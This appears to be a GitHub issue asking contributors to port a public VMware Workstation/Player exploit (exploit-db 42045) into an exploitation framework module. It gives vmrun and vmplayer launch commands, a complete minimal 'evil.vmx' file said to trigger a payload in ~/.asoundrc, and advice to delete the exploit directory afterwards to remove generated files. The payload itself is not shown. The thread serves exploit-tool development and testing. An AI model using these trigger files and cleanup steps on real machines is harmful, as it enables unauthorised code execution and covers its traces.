As per request by @sempervictus someone should write
https://www.exploit-db.com/exploits/42045/
for reals though, it's a softball beyond softballs.
Next, in the VMware Workstation UI, open a VM with a virtual sound card and start it.
Not a blocker, but it's a notable requirement. Can probably use vmrun or whatever.
You can launch virtual machines with Workstation using:
vmrun -T ws start /path/to/vm/evil.vmx
It's worth noting that this issue affects both VMware Workstation and VMware Player.
You can launch virtual machines with Player using:
vmplayer /path/to/vm/evil.vmx
This might be useful in instances where VMware Player is registered but VMware Workstation is not. Unregistered Workstation cannot open VMs.
This barebones VMX file is sufficient to trigger the payload in ~/.asoundrc:
.encoding = "UTF-8"
config.version = "8"
virtualHW.version = "11"
scsi0.present = "TRUE"
memsize = "4"
ide0:0.present = "FALSE"
sound.present = "TRUE"
sound.fileName = "-1"
sound.autodetect = "TRUE"
vmci0.present = "TRUE"
hpet0.present = "TRUE"
displayName = "evil"
guestOS = "other"
nvram = "evil.nvram"
virtualHW.productCompatibility = "hosted"
gui.exitOnCLIHLT = "FALSE"
powerType.powerOff = "soft"
powerType.powerOn = "soft"
powerType.suspend = "soft"
powerType.reset = "soft"
floppy0.present = "FALSE"
The VMX should be placed in a directory that will be deleted after exploitation, as VMware will automatically generate a bunch of files in the same directory as the vmx.
$ ls -lah evil
total 4.3M
drwxr-xr-x 3 user user 4.0K Jun 18 08:41 .
drwxr-xr-x 4 user user 4.0K Jun 18 08:41 ..
-rw------- 1 user user 4.0M Jun 18 08:41 564d802f-e41a-1e84-d10e-57dedf741002.vmem
drwxrwxrwx 2 user user 4.0K Jun 18 08:41 564d802f-e41a-1e84-d10e-57dedf741002.vmem.lck
-rw------- 1 user user 8.5K Jun 18 08:41 evil.nvram
-rw-r--r-- 1 user user 0 Jun 18 08:41 evil.vmsd
-rwxr-xr-x 1 user user 1.1K Jun 18 08:41 evil.vmx
-rw-r--r-- 1 user user 259 Jun 18 08:41 evil.vmxf
-rw-r--r-- 1 user user 130K Jun 18 08:41 vmware.log
Verified on VMware 11.1.2 on Linux Mint and 12.5.0 on Debian Linux.
PR #8581
Added in #8581